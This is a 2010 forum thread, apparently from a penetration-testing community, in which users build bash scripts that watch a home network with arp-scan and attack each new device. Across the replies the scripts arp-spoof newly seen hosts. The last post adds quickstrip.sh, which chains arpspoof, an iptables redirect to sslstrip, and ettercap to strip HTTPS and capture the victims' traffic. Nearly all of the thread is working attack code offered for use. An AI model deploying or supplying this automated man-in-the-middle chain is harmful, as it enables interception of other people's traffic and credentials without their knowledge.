Results 1 to 4 of 4

Thread: arpscan network and action on new device

  1. #1
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    13

    Question arpscan network and action on new device

    Hi guys,

    Anyone know of a premade script (pref bash) that would scan the current subnet of an interface and if a new device appears perform an action.

    Basically i want to monitor my home network for new devices, if someone connects to my network i'm legally allowed to divert all of thier http requests.

    Cheers

  2. #2
    Just burned his ISO
    Join Date
    Feb 2010
    Location
    a swamp in canada
    Posts
    12

    Default

    Quote Originally Posted by phillips321 View Post
    Hi guys,

    Anyone know of a premade script (pref bash) that would scan the current subnet of an interface and if a new device appears perform an action.

    Basically i want to monitor my home network for new devices, if someone connects to my network i'm legally allowed to divert all of thier http requests.

    Cheers
    From reading your post it sounds as if you have left a wireless network open in hopes someone will connect to it so you can sniff the traffic and if thats the case I would recommend securing your network against unauthorized access before worrying about launching automated attacks,


    anyways i whipped this up quickly.

    Code:
    #!/bin/bash
    #--------------------------------------Fill in your info--------------------------------------------------
    varrouter=192.168.1.1
    varinterface=eth1
    #---------------------------------------------------------------------------------------------------------
    
    #-------------------Do not look at the following mess it will blind you ----------------------------------
    arp-scan -l | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > scan.txt
    varbadip=`diff -a scan.txt wl.txt | grep \< | sed -e 's/< //'`
    
    if [[ $badip != // ]]; then
    echo "New IP Address detected: " $varbadip
    echo "Router Address         : " $varrouter
    echo "Selected Interface     : " $varinterface
    arpspoof -i $varinterface -t $varbadip $varrouter
    fi
    #--------------------------------------------------------------------------------------------------------
    ok so basically you need to create a white list named wl.txt and each ip address needs to be on its own line

    Code:
    192.168.1.1
    192.168.1.13
    192.168.1.56
    192.168.1.34
    then you need to install arp-scan

    Code:
    apt-get install arp-scan
    then run the script, if it sees an address outside of the white list it will start arp spoofing it.

    this is pretty much hacked together, i only wrote it for one new address on the network, 2 or more new addresses will most likely break it but if i get some time this week i might work on it to improve my horrible bash skills.
    Last edited by mrshrek; 03-03-2010 at 12:30 PM.

  3. #3
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    13

    Default Re: arpscan network and action on new device

    Cheers for this.

    I took it upon me to start with your code then throw something together myself.

    I don't use bash often so this is a HUGE mess of code! Basically the script asks for interface and arpscan interval.

    You can then call on a custom command each time a new device is found.

    Code:
    #!/bin/bash
    # monitor.sh v1.0
    #
    # This tool requires arp-scan to be installed and to be run as root
    #
    # ChangeLog....
    # Version 1.0 - First Release
    #################################################################
    # CHECKING FOR ROOT
    #################################################################
    if [ `echo -n $USER` != "root" ]
    then
    	echo "MESSAGE:"
    	echo "MESSAGE: ERROR: Please run as root!"
    	echo "MESSAGE:"
    	exit 1
    fi
    
    #################################################################
    # CHECKING TO SEE IF INTERFACE PROVIDED
    #################################################################
    if [ -z ${1} ]
    then
    	echo "MESSAGE: Usage: `basename ${0}` [interface] [time between scans (secs)]"
    	echo "MESSAGE: `basename ${0}` eth0 60"
    	echo "ERROR: Please provide an interface to scan on"
    	exit 1
    else
    	INTERFACE="`echo "${1}" | cut -c 1-6`"
    	echo "MESSAGE: Monitoring ${1} for new devices"
    fi
    
    #################################################################
    # CHECKING TO SEE IF PROBE INTERVAL GIVEN
    #################################################################
    if [ -z ${2} ]
    then
    	echo "MESSAGE: Usage: `basename ${0}` [interface] [time between scans (secs)]"
    	echo "MESSAGE: `basename ${0}` eth0 60"
    	echo "ERROR: Please provide a scan interval in seconds"
    	exit 1
    else
    	INTERVAL="`echo "${2}" | tr -cd '[:digit:]' | cut -c 1-4`"
    	echo "MESSAGE: Scanning once every ${INTERVAL} seconds"
    fi
    
    #################################################################
    # IDENTIFY IP, GATEWAY and SUBNET
    #################################################################
    IPADDR=`ifconfig ${INTERFACE} | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
    SUBNET=`ifconfig ${INTERFACE} | grep 'Mask:'| grep -v '127.0.0.1' | cut -d: -f4`
    GATEWAY=`route -n | grep ${INTERFACE} | cut -d' ' -f 1 | grep -v 0.0.0.0 | grep -v 169.254`
    echo "MESSAGE: interface=${INTERFACE} gateway=${GATEWAY} ip.addr=${IPADDR} subnet=${SUBNET}"
    
    #################################################################
    # DELETE FILES FROM PREVIOUS SCANS
    #################################################################
    rm -rf SCAN.txt WHITELIST.txt
    
    #################################################################
    # PERFORMING FIRST SCAN TO CREATE WHITELIST
    #################################################################
    arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > WHITELIST.txt
    
    if [[ -s WHITELIST.txt ]] ; then
    	echo "MESSAGE: The following devices were found and will be excluded from this monitor."
    	cat WHITELIST.txt
    else
    	echo "MESSAGE: No IPs found during arp-scan, are you sure your interface is up?."
    	exit 1
    fi ;
    
    #################################################################
    # THIS IS THE MONITORING BIT
    #################################################################
    while true; do
    	arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > SCAN.txt
    	sort SCAN.txt > tmp.txt
    	cat tmp.txt > SCAN.txt
    	rm tmp.txt
    	NEWIP=`diff -a SCAN.txt WHITELIST.txt | grep \< | sed -e 's/< //'`
    	if [ ! -z ${NEWIP}  ]; then
    		echo "MESSAGE: New IP detected!!! ${NEWIP}"
    		echo ${NEWIP} >> WHITELIST.txt
    		#################################################################
    		# To run a command when new device found please enter it here
    		xterm -e "nmap ${NEWIP}"
    		#################################################################		
    	fi
    	sort WHITELIST.txt > tmp.txt
    	cat tmp.txt > WHITELIST.txt
    	rm tmp.txt
    	sleep ${INTERVAL}
    done
    
    exit 0
    To exit the while loop you need to Ctrl-c. Any idea on a batter way to allow the user to exit the while loop? Then i'll be able to delete the files created during the script (SCAN.txt and WHITELIST.txt).

    Also any idea on how i can improve this bit:

    Code:
    sort WHITELIST.txt > tmp.txt
    cat tmp.txt > WHITELIST.txt
    rm tmp.txt
    and

    Code:
    sort SCAN.txt > tmp.txt
    cat tmp.txt > SCAN.txt
    rm tmp.txt
    Cheers

  4. #4
    Just burned his ISO
    Join Date
    Feb 2010
    Location
    a swamp in canada
    Posts
    12

    Default Re: arpscan network and action on new device

    edited to fix my long winded post and fix a few errors.

    monitor.sh v1.0.1

    Code:
    #!/bin/bash
    # monitor.sh v1.0.1  
    # creator: phillips321
    # This tool requires arp-scan to be installed and to be run as root
    #
    # ChangeLog....
    # Version 1.0.1 - Minor fixes
    # Version 1.0   - First Release
    #################################################################
    # CHECKING FOR ROOT
    #################################################################
    if [ `echo -n $USER` != "root" ]
    then
            echo "MESSAGE:"
            echo "MESSAGE: ERROR: Please run as root!"
            echo "MESSAGE:"
            exit 1
    fi
    
    #################################################################
    # CHECKING TO SEE IF INTERFACE PROVIDED
    #################################################################
    if [ -z ${1} ]
    then
            echo "MESSAGE: Usage: `basename ${0}` [interface] [time between scans (secs)]"
            echo "MESSAGE: `basename ${0}` eth0 60"
            echo "ERROR: Please provide an interface to scan on"
            exit 1
    else
            INTERFACE="`echo "${1}" | cut -c 1-6`"
            echo "MESSAGE: Monitoring ${1} for new devices"
    fi
    
    #################################################################
    # CHECKING TO SEE IF PROBE INTERVAL GIVEN
    #################################################################
    if [ -z ${2} ]
    then
            echo "MESSAGE: Usage: `basename ${0}` [interface] [time between scans (secs)]"
            echo "MESSAGE: `basename ${0}` eth0 60"
            echo "ERROR: Please provide a scan interval in seconds"
            exit 1
    else
            INTERVAL="`echo "${2}" | tr -cd '[:digit:]' | cut -c 1-4`"
            echo "MESSAGE: Scanning once every ${INTERVAL} seconds"
    fi
    
    #################################################################
    # IDENTIFY IP, GATEWAY and SUBNET
    #################################################################
    IPADDR=`ifconfig ${INTERFACE} | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
    SUBNET=`ifconfig ${INTERFACE} | grep 'Mask:'| grep -v '127.0.0.1' | cut -d: -f4`
    GATEWAY=`route -n | grep ${INTERFACE} | grep UG | sed -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 2`
    echo "MESSAGE: interface=${INTERFACE} gateway=${GATEWAY} ip.addr=${IPADDR} subnet=${SUBNET}"
    
    #################################################################
    # DELETE FILES FROM PREVIOUS SCANS
    #################################################################
    rm -rf SCAN.txt WHITELIST.txt
    
    #################################################################
    # PERFORMING FIRST SCAN TO CREATE WHITELIST
    #################################################################
    arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > WHITELIST.txt
    
    if [[ -s WHITELIST.txt ]] ; then
            echo "MESSAGE: The following devices were found and will be excluded from this monitor."
            cat WHITELIST.txt
    else
            echo "MESSAGE: No IPs found during arp-scan, are you sure your interface is up?."
            exit 1
    fi ;
    
    #################################################################
    # THIS IS THE MONITORING BIT
    #################################################################
    while true; do
            arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > SCAN.txt
            sort -n -t '.' +3 -0 -o SCAN.txt SCAN.txt
            NEWIP=`diff -a SCAN.txt WHITELIST.txt | grep \< | sed -e 's/< //'`
            if [ ! -z ${NEWIP}  ]; then
                    echo "MESSAGE: New IP detected!!! ${NEWIP}"
                    echo ${NEWIP} >> WHITELIST.txt
                    #################################################################
                    # To run a command when new device found please enter it here
                    konsole -e ./quickstrip.sh ${INTERFACE} ${NEWIP} &
                    # xterm -e "nmap ${NEWIP}"
                    #################################################################
            fi
            sort -n -t '.' +3 -0 -o WHITELIST.txt WHITELIST.txt
            read -t ${INTERVAL} && break
    done
    
    rm -rf WHITELIST.txt SCAN.txt
    
    exit 0
    quickstrip v1.0.1

    Code:
    #!/bin/bash
    # quickstrip.sh v1.0.1
    # creator: mrshrek
    # This tool requires arpspoof ettercap and sslstrip to be installed
    # It also must be run as root.
    #
    # Designed to be used with Phillips321's monitor.sh or on its own
    #
    # ChangeLog...
    # Version 1.0.1 - Minor fixes, checked for instances of sslstrip
    #               - and ettercap so it wouldnt fail when called
    #               - multiple times by monitor.sh
    #               - also added cleanup script for multiple instances.
    #
    # Version 1.0   - First Release
    #################################################################
    # CHECKING FOR ROOT
    #################################################################
    if [ `echo -n $USER` != "root" ]
    then
            echo "ERROR: Please run as root!"
            exit 1
    fi
    #################################################################
    # CHECK TO SEE IF THERE IS AN OLD CLEANUP SCRIPT
    #################################################################
    if [ -a sslcleanup.sh ]
      then
        rm -rf sslcleanup.sh
    fi
    #################################################################
    # CHECK FOR ARGS
    #################################################################
    if [ -z $1 ] || [ -z $2 ]
      then
        echo "Usage: ./quickstrip.sh INTERFACE IPADDRESS"
        exit 1
      else
    #################################################################
    # SETUP IP FORWARDING AND IPTABLES
    #################################################################
        IP_FORWARD=`cat /proc/sys/net/ipv4/ip_forward`
        if [ $IP_FORWARD != 1 ]
          then
            echo 1 > /proc/sys/net/ipv4/ip_forward
        fi
        iptables -t nat -A PREROUTING -i $1 -p tcp --dport 80 -j REDIRECT --to-port 10000
    #################################################################
    # SETUP ARPSPOOF, ETTERCAP AND SSLSTRIP.  CHECK OTHER INSTANCES
    #################################################################
        GATEWAY=`route -n | grep $1 | grep UG | sed -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 2`
        ETTERPID=`ps aux | grep "ettercap -T -q -i" | grep -v grep | sed -e "s/[ /t][ /t]*/#/g" | cut -d '#' -f 2`
        SSLPID=`ps aux | grep "sslstrip" | grep "python" | sed -e "s/[ /t][ /t]*/#/g" | cut -d '#' -f 2`
    
        konsole -e arpspoof -i $1 -t $2 $GATEWAY &
        if [ -z $SSLPID ]
          then
            konsole -e sslstrip -a -k -f &
        fi
        if [ -z $ETTERPID ]
          then
            ettercap -T -q -i $1
        fi
    fi
    ##################################################################
    # CLEAN UP THE MESS IF WE ARE ALL DONE.
    ##################################################################
    if [ -z $ETTERPID ] || [ -z $SSLPID ]
      then
        iptables -t nat -D PREROUTING -i $1 -p tcp --dport 80 -j REDIRECT --to-port 10000
        echo 0 > /proc/sys/net/ipv4/ip_forward
        rm sslstrip.log
      else
        echo "SSLSTRIP or ETTERCAP still running."
        echo "To clean up please run: sslcleanup.sh"
        if [ -a sslcleanup.sh ]
          then
            exit 0
        else
          echo "iptables -t nat -D PREROUTING -i $1 -p tcp --dport 80 -j REDIRECT --to-port 10000" > sslcleanup.sh
          echo "echo 0 > /proc/sys/net/ipv4/ip_forward" >> sslcleanup.sh
          echo "rm sslstrip.log" >> sslcleanup.sh
          chmod +x sslcleanup.sh
        fi
    fi
    Last edited by mrshrek; 03-05-2010 at 06:27 PM.

Similar Threads

  1. Alfa vs Ubiquiti: Best USB / PCI Wireless Device?
    By seanothan in forum Beginners Forum
    Replies: 3
    Last Post: 09-12-2010, 08:38 PM
  2. Add bluetooth device to BT4
    By cgelici in forum Beginners Forum
    Replies: 8
    Last Post: 05-02-2010, 06:48 AM
  3. No Space Left On Device
    By miata in forum Beginners Forum
    Replies: 6
    Last Post: 02-11-2010, 10:25 AM
  4. Sound device
    By halfdone in forum Beginners Forum
    Replies: 1
    Last Post: 01-28-2010, 02:46 AM
  5. SIOCSIFADDR: No such device?
    By UnknownError in forum Beginners Forum
    Replies: 7
    Last Post: 01-20-2010, 01:19 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •